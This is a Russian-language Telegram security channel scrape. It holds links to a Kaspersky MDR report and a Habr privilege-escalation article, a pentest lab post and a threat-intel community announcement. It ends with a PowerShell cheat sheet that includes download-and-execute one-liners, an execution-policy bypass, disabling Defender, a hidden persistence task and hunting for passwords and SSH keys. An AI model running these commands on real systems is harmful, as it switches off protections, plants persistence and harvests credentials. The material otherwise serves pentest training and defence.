Аналитический отчет
Managed Detection
and Response
🔗Ссылка:
https://content.kaspersky-labs.com/fm/site-editor/2c/2c91a79372c7adb17dbc361ce3573313/source/10680reportmdr-irfairy-tale-3291mdrru-03-27.pdf
Managed Detection
and Response
🔗Ссылка:
https://content.kaspersky-labs.com/fm/site-editor/2c/2c91a79372c7adb17dbc361ce3573313/source/10680reportmdr-irfairy-tale-3291mdrru-03-27.pdf
Хабр
В начале был принтер. Как получить привилегии администратора домена, начав с принтера
Еще в прошлом году мы c командой решили поделиться несколькими интересными векторами получения привилегий администратора домена. По отзывам, первая статья оказалась полезной и интересной. Настало...
🔗Ссылка:
https://habr.com/ru/post/725008/
https://habr.com/ru/post/725008/
Forwarded from Whitehat Lab
Виртуальная лаборатория, основанная на
Предустановленные лабы и инструменты:
▪️ OWASP Juice Shop▪️ WebGoat▪️ Mutillidae▪️ bWAPP▪️ DVWA▪️ Burp Suite▪️ Nikto▪️ SQLMap
#web #pentest #samurai
Please open Telegram to view this post
VIEW IN TELEGRAM
Fsecurity | HH
Ролик на канале 🍷 Приятного просмотра 🍿 🔗Ссылка: https://youtu.be/goNOkFLHzFs
👆Накидайте комментариев под ролик для продвижения 📈
Forwarded from s0ld13r ch. (s0ld13r)
Threat Intelligence drop ragghhhh 🕺 🕺
Рефлексируя тематику этого канала, решил запустить небольшой комьюнити проект для шейра индикаторов компрометации и угроз которые таргетят Центральную Азию (и не только)💃
Думаю это логичное продолжение тематики TI на канале, чтобы где то можно было собрать все находки и передавать их комьюнити❤️
В скором времени начну активно добавлять IoC с различных исследований, фидов и залью индикаторы которые смог найти в предыдущих постах😎
Буду рад вкладу каждого в развитие TI платформы (на базе MISP) — можно присылать свои находки, ссылки на репорты, дампы, фиды и просто идеи. Даже маленький IoC может оказаться критически важным для других, все абсолютно бесплатно и на безвозмездной основе, если будет желание подключиться и помочь то мой лс всегда открыт😸
Рад представить вам threatintel.kz👋
🧢 s0ld13r
Рефлексируя тематику этого канала, решил запустить небольшой комьюнити проект для шейра индикаторов компрометации и угроз которые таргетят Центральную Азию (и не только)
Думаю это логичное продолжение тематики TI на канале, чтобы где то можно было собрать все находки и передавать их комьюнити
В скором времени начну активно добавлять IoC с различных исследований, фидов и залью индикаторы которые смог найти в предыдущих постах
Буду рад вкладу каждого в развитие TI платформы (на базе MISP) — можно присылать свои находки, ссылки на репорты, дампы, фиды и просто идеи. Даже маленький IoC может оказаться критически важным для других, все абсолютно бесплатно и на безвозмездной основе, если будет желание подключиться и помочь то мой лс всегда открыт
Рад представить вам threatintel.kz
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Forwarded from Whitehat Lab
Для выполнения некоторых командлетов необходим импортированный AD модуль
Подключаем:
Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory
или
Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module C:\ActiveDirectory\ActiveDirectory.psd1
Get-Command -Module ActiveDirectory
Информация о системе:
Get-WmiObject -Class Win32_OperatingSystem | Select-Object -Property *
Список процессов:
Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending
FailureAudit в логах:
Get-EventLog -LogName Security | Where-Object {$_.EntryType -eq 'FailureAudit'}Сканер портов:
1..1024 | ForEach-Object { $sock = New-Object System.Net.Sockets.TcpClient; $async = $sock.BeginConnect('localhost', $_, $null, $null); $wait = $async.AsyncWaitHandle.WaitOne(100, $false); if($sock.Connected) { $_ } ; $sock.Close() }Выполнить команду на удаленном ПК:
Invoke-Command -ComputerName TargetPC -ScriptBlock { Get-Process } -Credential (Get-Credential)Скачать и выполнить скрипт:
$url = 'http://example.com/script.ps1'; Invoke-Expression (New-Object Net.WebClient).DownloadString($url)
Execution policy bypass:
Set-ExecutionPolicy Bypass -Scope Process -Force; .\script.ps1
Список доменных юзеров:
# Нужен AD модуль
Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate
Список залогиненых юзеров:
Get-WMIObject -Class Win32_ComputerSystem -Computer "HOST01" | Select-Object Username
Давно не логинились, но УЗ включена:
# Нужен AD модуль
Get-ADuser -filter {enabled -eq "True"} -properties LastlogonDate | ? {$_.lastlogondate -le (get-date).adddays(-90)} | ft Name
Прибить процесс:
Get-Process -Name "Notepad" | Stop-Process -Force
Список установленного ПО:
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, Publisher, InstallDate
Мониторинг изменений ФС:
$watcher = New-Object System.IO.FileSystemWatcher; $watcher.Path = 'C:\'; $watcher.IncludeSubdirectories = $true; $watcher.EnableRaisingEvents = $true; Register-ObjectEvent $watcher 'Created' -Action { Write-Host 'File Created: ' $Event.SourceEventArgs.FullPath }Отключаем Defender:
Set-MpPreference -SubmitSamplesConsent NeverSend
Set-MpPreference -MAPSReporting Disabled
Set-MpPreference -DisableRealtimeMonitoring $true
Задание в планировщик для закрепа:
$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "YourCommand"'; $trigger = New-ScheduledTaskTrigger -AtStartup; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'MyTask' -Description 'MyDescription'
Поиск паролей в текстовых файлах:
Select-String -Path C:\Users\*\Documents\*.txt -Pattern 'password' -CaseSensitive
Собираем SSH ключи:
Get-ChildItem -Path C:\Users\*\.ssh\id_rsa -Recurse
Продолжение следует
#powershell #windows
Please open Telegram to view this post
VIEW IN TELEGRAM